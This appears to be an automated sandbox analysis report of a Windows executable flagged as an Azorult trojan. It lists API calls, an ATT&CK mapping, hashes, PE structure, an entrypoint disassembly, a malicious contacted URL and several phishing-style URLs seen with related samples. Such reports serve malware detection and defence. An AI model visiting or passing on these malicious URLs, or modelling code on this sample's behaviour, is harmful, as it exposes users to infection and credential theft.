Code function: 1_2_00419F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle,

1_2_00419F90

Source: C:\Users\user\Desktop\bP5g4FsSJk.exe

Process created: C:\Users\user\Desktop\bP5g4FsSJk.exe "C:\Users\user\Desktop\bP5g4FsSJk.exe"

Jump to behavior

Source: C:\Users\user\Desktop\bP5g4FsSJk.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free,	1_2_0043404A
Source: C:\Users\user\Desktop\bP5g4FsSJk.exe	Code function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,	1_2_00438178
Source: C:\Users\user\Desktop\bP5g4FsSJk.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	1_2_00440116
Source: C:\Users\user\Desktop\bP5g4FsSJk.exe	Code function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,	1_2_004382A2
Source: C:\Users\user\Desktop\bP5g4FsSJk.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,	1_2_0043834F
Source: C:\Users\user\Desktop\bP5g4FsSJk.exe	Code function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,	1_2_00438423
Source: C:\Users\user\Desktop\bP5g4FsSJk.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	1_2_004335E7
Source: C:\Users\user\Desktop\bP5g4FsSJk.exe	Code function: EnumSystemLocalesW,	1_2_004387C8
Source: C:\Users\user\Desktop\bP5g4FsSJk.exe	Code function: GetLocaleInfoW,	1_2_0043884E
Source: C:\Users\user\Desktop\bP5g4FsSJk.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,_free,_free,	1_2_00432B6D
Source: C:\Users\user\Desktop\bP5g4FsSJk.exe	Code function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,__invoke_watson,_LcidFromHexString,GetLocaleInfoW,	1_2_00437BB3
Source: C:\Users\user\Desktop\bP5g4FsSJk.exe	Code function: EnumSystemLocalesW,	1_2_00437E27
Source: C:\Users\user\Desktop\bP5g4FsSJk.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,	1_2_00437E83
Source: C:\Users\user\Desktop\bP5g4FsSJk.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,	1_2_00437F00
Source: C:\Users\user\Desktop\bP5g4FsSJk.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,	1_2_0042BF17
Source: C:\Users\user\Desktop\bP5g4FsSJk.exe	Code function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,	1_2_00437F83
Source: C:\Users\user\Desktop\bP5g4FsSJk.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,	1_2_00432FAD

Source: C:\Users\user\Desktop\bP5g4FsSJk.exe

Code function: 1_2_00427756 cpuid

1_2_00427756

Source: C:\Users\user\Desktop\bP5g4FsSJk.exe

Code function: 0_2_0049EDAB GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

0_2_0049EDAB

Source: C:\Users\user\Desktop\bP5g4FsSJk.exe

Code function: 1_2_0042FE47 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

1_2_0042FE47

Source: C:\Users\user\Desktop\bP5g4FsSJk.exe

1_2_00419F90

Source: C:\Users\user\Desktop\bP5g4FsSJk.exe

1_2_00419F90

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	2 Command and Scripting Interpreter	Path Interception	1 Exploitation for Privilege Escalation	111 Process Injection	OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	21 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	3 Native API	Boot or Logon Initialization Scripts	111 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	41 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	2 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	3 Obfuscated Files or Information	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	2 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	2 Software Packing	NTDS	1 Account Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	13 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	1 System Owner/User Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	1 Remote System Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	1 File and Directory Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	23 System Information Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
bP5g4FsSJk.exe	53%	ReversingLabs	Win32.Trojan.Azorult
bP5g4FsSJk.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
1.0.bP5g4FsSJk.exe.400000.8.unpack	100%	Avira	HEUR/AGEN.1223627	Download File
0.2.bP5g4FsSJk.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1229097	Download File
1.0.bP5g4FsSJk.exe.400000.5.unpack	100%	Avira	HEUR/AGEN.1223627	Download File
1.0.bP5g4FsSJk.exe.400000.6.unpack	100%	Avira	HEUR/AGEN.1223627	Download File
1.0.bP5g4FsSJk.exe.400000.7.unpack	100%	Avira	HEUR/AGEN.1223627	Download File
1.0.bP5g4FsSJk.exe.400000.10.unpack	100%	Avira	HEUR/AGEN.1223627	Download File
1.0.bP5g4FsSJk.exe.400000.9.unpack	100%	Avira	HEUR/AGEN.1223627	Download File
1.2.bP5g4FsSJk.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1223627	Download File
1.0.bP5g4FsSJk.exe.400000.4.unpack	100%	Avira	HEUR/AGEN.1223627	Download File

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://acacaca.org/test2/get.php	100%	Avira URL Cloud	malware
http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
api.2ip.ua	162.0.217.254	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://acacaca.org/test2/get.php	true	Avira URL Cloud: malware	unknown
https://api.2ip.ua/geo.json	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error	bP5g4FsSJk.exe, 00000000.00000002.278746171.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, bP5g4FsSJk.exe, 00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bP5g4FsSJk.exe, 00000001.00000000.273505881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bP5g4FsSJk.exe, 00000001.00000000.272056178.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://api.2ip.ua/geo.jsonY	bP5g4FsSJk.exe, 00000001.00000002.286593471.00000000008EF000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.2ip.ua/	bP5g4FsSJk.exe, 00000001.00000002.286817281.000000000090D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.2ip.ua/geo.jsont	bP5g4FsSJk.exe, 00000001.00000002.286414138.00000000008C7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.2ip.ua/geo.jsong	bP5g4FsSJk.exe, 00000001.00000002.286593471.00000000008EF000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.2ip.ua/geo.json6	bP5g4FsSJk.exe, 00000001.00000002.286414138.00000000008C7000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.openssl.org/support/faq.html	bP5g4FsSJk.exe, 00000001.00000000.272056178.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false		high
https://api.2ip.ua/geo.jsons	bP5g4FsSJk.exe, 00000001.00000002.286414138.00000000008C7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.2ip.ua/Y%	bP5g4FsSJk.exe, 00000001.00000002.286817281.000000000090D000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
162.0.217.254	api.2ip.ua	Canada		35893	ACPCA	false

General Information

Joe Sandbox Version:	35.0.0 Citrine
Analysis ID:	679166
Start date and time: 05/08/202211:11:07	2022-08-05 11:11:07 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 53s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	bP5g4FsSJk.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	28
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal84.rans.troj.evad.winEXE@3/0@1/1
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 91.7% (good quality ratio 84.8%) Quality average: 79.9% Quality standard deviation: 30.9%
HCA Information:	Successful, ratio: 60% Number of executed functions: 7 Number of non-executed functions: 86
Cookbook Comments:	Found application associated with file extension: .exe Adjust boot time Enable AMSI

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
Excluded IPs from analysis (whitelisted): 23.211.6.115
Excluded domains from analysis (whitelisted): www.bing.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, fs.microsoft.com, login.live.com, store-images.s-microsoft.com, sls.update.microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
VT rate limit hit for: bP5g4FsSJk.exe

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
162.0.217.254	ej2hDYMBXF.exe	Get hash	malicious	Browse
	0qlnWcmhSC.exe	Get hash	malicious	Browse
	PtfqFnZtxB.exe	Get hash	malicious	Browse
	1cRmz4h1f8.exe	Get hash	malicious	Browse
	7C2P2CKtTz.exe	Get hash	malicious	Browse
	gvNe7sM8sZ.exe	Get hash	malicious	Browse
	bZDACRYCi1.exe	Get hash	malicious	Browse
	jeqBDEzDeE.exe	Get hash	malicious	Browse
	vxSBCLoYso.exe	Get hash	malicious	Browse
	51BF4Ql66U.exe	Get hash	malicious	Browse
	ulRYla6dh8.exe	Get hash	malicious	Browse
	IrPYliXpsE.exe	Get hash	malicious	Browse
	TS7siNTM0e.exe	Get hash	malicious	Browse
	X0De3Qm2Ds.exe	Get hash	malicious	Browse
	3zq7lZXEzv.exe	Get hash	malicious	Browse
	iO2Kt7Bcc5.exe	Get hash	malicious	Browse
	OH9kno5VD8.exe	Get hash	malicious	Browse
	2ajRPqLDTp.exe	Get hash	malicious	Browse
	yFJE9XnfK8.exe	Get hash	malicious	Browse
	oH4kfC6LyB.exe	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
api.2ip.ua	ej2hDYMBXF.exe	Get hash	malicious	Browse	162.0.217.254
	0qlnWcmhSC.exe	Get hash	malicious	Browse	162.0.217.254
	PtfqFnZtxB.exe	Get hash	malicious	Browse	162.0.217.254
	1cRmz4h1f8.exe	Get hash	malicious	Browse	162.0.217.254
	7C2P2CKtTz.exe	Get hash	malicious	Browse	162.0.217.254
	gvNe7sM8sZ.exe	Get hash	malicious	Browse	162.0.217.254
	bZDACRYCi1.exe	Get hash	malicious	Browse	162.0.217.254
	jeqBDEzDeE.exe	Get hash	malicious	Browse	162.0.217.254
	vxSBCLoYso.exe	Get hash	malicious	Browse	162.0.217.254
	51BF4Ql66U.exe	Get hash	malicious	Browse	162.0.217.254
	ulRYla6dh8.exe	Get hash	malicious	Browse	162.0.217.254
	IrPYliXpsE.exe	Get hash	malicious	Browse	162.0.217.254
	TS7siNTM0e.exe	Get hash	malicious	Browse	162.0.217.254
	X0De3Qm2Ds.exe	Get hash	malicious	Browse	162.0.217.254
	3zq7lZXEzv.exe	Get hash	malicious	Browse	162.0.217.254
	iO2Kt7Bcc5.exe	Get hash	malicious	Browse	162.0.217.254
	OH9kno5VD8.exe	Get hash	malicious	Browse	162.0.217.254
	2ajRPqLDTp.exe	Get hash	malicious	Browse	162.0.217.254
	yFJE9XnfK8.exe	Get hash	malicious	Browse	162.0.217.254
	oH4kfC6LyB.exe	Get hash	malicious	Browse	162.0.217.254

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
ACPCA	ej2hDYMBXF.exe	Get hash	malicious	Browse	162.0.217.254
	0qlnWcmhSC.exe	Get hash	malicious	Browse	162.0.217.254
	xd.arm	Get hash	malicious	Browse	162.37.47.101
	PtfqFnZtxB.exe	Get hash	malicious	Browse	162.0.217.254
	1cRmz4h1f8.exe	Get hash	malicious	Browse	162.0.217.254
	7C2P2CKtTz.exe	Get hash	malicious	Browse	162.0.217.254
	gvNe7sM8sZ.exe	Get hash	malicious	Browse	162.0.217.254
	bZDACRYCi1.exe	Get hash	malicious	Browse	162.0.217.254
	http://9b16e70612995.moonlinetours.com/wb/#YlM1dFlXUnJiM1Z5UUdWcFlpNXZjbWNO	Get hash	malicious	Browse	162.0.217.117
	jeqBDEzDeE.exe	Get hash	malicious	Browse	162.0.217.254
	vxSBCLoYso.exe	Get hash	malicious	Browse	162.0.217.254
	51BF4Ql66U.exe	Get hash	malicious	Browse	162.0.217.254
	ulRYla6dh8.exe	Get hash	malicious	Browse	162.0.217.254
	IrPYliXpsE.exe	Get hash	malicious	Browse	162.0.217.254
	TS7siNTM0e.exe	Get hash	malicious	Browse	162.0.217.254
	X0De3Qm2Ds.exe	Get hash	malicious	Browse	162.0.217.254
	3zq7lZXEzv.exe	Get hash	malicious	Browse	162.0.217.254
	iO2Kt7Bcc5.exe	Get hash	malicious	Browse	162.0.217.254
	OH9kno5VD8.exe	Get hash	malicious	Browse	162.0.217.254
	2ajRPqLDTp.exe	Get hash	malicious	Browse	162.0.217.254

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
37f463bf4616ecd445d4a1937da06e19	GI3I8IbuVE.exe	Get hash	malicious	Browse	162.0.217.254
	uGfpJynSWM.exe	Get hash	malicious	Browse	162.0.217.254
	3CzQDO1WLI.exe	Get hash	malicious	Browse	162.0.217.254
	ej2hDYMBXF.exe	Get hash	malicious	Browse	162.0.217.254
	0qlnWcmhSC.exe	Get hash	malicious	Browse	162.0.217.254
	http://www.malware-traffic-analysis.net/2018/02/16/index.html	Get hash	malicious	Browse	162.0.217.254
	SecuriteInfo.com.W32.AIDetectNet.01.19566.exe	Get hash	malicious	Browse	162.0.217.254
	SecuriteInfo.com.W32.AIDetectNet.01.19595.exe	Get hash	malicious	Browse	162.0.217.254
	RevisedSalesContractINV.html	Get hash	malicious	Browse	162.0.217.254
	SecuriteInfo.com.Trojan.MSIL.FormBook.IZFA.MTB.26806.exe	Get hash	malicious	Browse	162.0.217.254
	Q3 Bonus1.HTMl	Get hash	malicious	Browse	162.0.217.254
	bf.exe	Get hash	malicious	Browse	162.0.217.254
	Secured_angela.johnson_Audio_Message.htm	Get hash	malicious	Browse	162.0.217.254
	SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exe	Get hash	malicious	Browse	162.0.217.254
	https://www.frontrush.com/FR_Web_App/Message/MessageTracking.aspx?code=ODYzOTUxNTsyNjM3ODcyODtSOzgxOTc7TA==-f+lhm4TMRSg=&redir=http://4267.s1oAXteFRf.beyondsm.com/?=accountsreceivable@seven.com.au	Get hash	malicious	Browse	162.0.217.254
	.html	Get hash	malicious	Browse	162.0.217.254
	download.js	Get hash	malicious	Browse	162.0.217.254
	https://vps67241.inmotionhosting.com/~mombasavacation/kpl/MailUpdateFresh/index.html#	Get hash	malicious	Browse	162.0.217.254
	http://z2p5g.pwtel.pa-jakartautara.go.id.///?ZZZ#.Z21hY2RvbmFsZEBoaWdod29vZG9pbC5jb20=	Get hash	malicious	Browse	162.0.217.254
	https://cdeusa.od2.vtiger.com/pages/8f3624gue6_98246trf7	Get hash	malicious	Browse	162.0.217.254

Dropped Files

⊘No context

Created / dropped Files

⊘No created / dropped files found

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.841901633749817
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	bP5g4FsSJk.exe
File size:	748032
MD5:	28fb096cbce32cf1f87719254452014f
SHA1:	50ceaddc379e1376a579e4c9d4465fd3c734c277
SHA256:	1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98
SHA512:	eb5468f817ca4dee892eb200e920796e175298667fc86f934912c6bd304aa54d39ad4535fa12bdd0c803ac7ee164281372dc364ad97542585209fa39447b5a9f
SSDEEP:	12288:+5v3qTuu7zbgLsSFKUilhkehB/MLfSTOIPAU+dmb:+5vo1SogidMLZHmb
TLSH:	18F4123032E1C036E1B61238447D8FA51ABEFC222BB4898767D42A1D6E677C05E7975F
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ADK. .. .. ..V... ..V... ..X... .. +.f ..V... ..V... ..V... .Rich. *.........................PE..L...!.K`...........

File Icon


Icon Hash:	8a9099a9ca8cd2f2

Static PE Info

General

Entrypoint:	0x498550
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x604BC821 [Fri Mar 12 19:59:29 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	52981a63110ae9001dc5c79717e57d47

Entrypoint Preview

Instruction
call 00007FB788BC00DBh
jmp 00007FB788BB970Eh
int3
int3
int3
int3
int3
int3
call 00007FB788BB98BCh
xchg cl, ch
jmp 00007FB788BB98A4h
call 00007FB788BB98B3h
fxch st(0), st(1)
jmp 00007FB788BB989Bh
fabs
fld1
mov ch, cl
xor cl, cl
jmp 00007FB788BB9891h
mov byte ptr [ebp-00000090h], FFFFFFFEh
fabs
fxch st(0), st(1)
fabs
fxch st(0), st(1)
fpatan
or cl, cl
je 00007FB788BB9886h
fldpi
fsubrp st(1), st(0)
or ch, ch
je 00007FB788BB9884h
fchs
ret
fabs
fld st(0), st(0)
fld st(0), st(0)
fld1
fsubrp st(1), st(0)
fxch st(0), st(1)
fld1
faddp st(1), st(0)
fmulp st(1), st(0)
ftst
wait
fstsw word ptr [ebp-000000A0h]
wait
test byte ptr [ebp-0000009Fh], 00000001h
jne 00007FB788BB9887h
xor ch, ch
fsqrt
ret
pop eax
jmp 00007FB788BC02AFh
fstp st(0)
fld tbyte ptr [004024DAh]
ret
fstp st(0)
or cl, cl
je 00007FB788BB988Dh
fstp st(0)
fldpi
or ch, ch
je 00007FB788BB9884h
fchs
ret
fstp st(0)
fldz
or ch, ch
je 00007FB788BB9879h
fchs
ret
fstp st(0)
jmp 00007FB788BC0285h
fstp st(0)
mov cl, ch
jmp 00007FB788BB9882h
call 00007FB788BB984Eh
jmp 00007FB788BC0290h
int3
int3
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
add esp, 00FFFD30h

Rich Headers

Programming Language:

[ASM] VS2010 build 30319
[ C ] VS2010 build 30319
[IMP] VS2008 SP1 build 30729
[C++] VS2010 build 30319
[RES] VS2010 build 30319
[LNK] VS2010 build 30319

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xa638c	0x3c	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x212e000	0xd568	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x1230	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x3690	0x40	.text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x1e0	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xa5eb4	0xa6000	False	0.9462317041603916	data	7.945996199237986	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0xa7000	0x20861cc	0x3000	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x212e000	0xd568	0xd600	False	0.6642997955607477	data	6.526730178678878	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x212e4e0	0xea8	data	Kannada	Kanada
RT_ICON	0x212f388	0x8a8	data	Kannada	Kanada
RT_ICON	0x212fc30	0x568	GLS_BINARY_LSB_FIRST	Kannada	Kanada
RT_ICON	0x2130198	0x25a8	data	Kannada	Kanada
RT_ICON	0x2132740	0x10a8	data	Kannada	Kanada
RT_ICON	0x21337e8	0x988	data	Kannada	Kanada
RT_ICON	0x2134170	0x468	GLS_BINARY_LSB_FIRST	Kannada	Kanada
RT_ICON	0x2134640	0xea8	data	Kannada	Kanada
RT_ICON	0x21354e8	0x8a8	data	Kannada	Kanada
RT_ICON	0x2135d90	0x6c8	data	Kannada	Kanada
RT_ICON	0x2136458	0x568	GLS_BINARY_LSB_FIRST	Kannada	Kanada
RT_ICON	0x21369c0	0x25a8	data	Kannada	Kanada
RT_ICON	0x2138f68	0x10a8	data	Kannada	Kanada
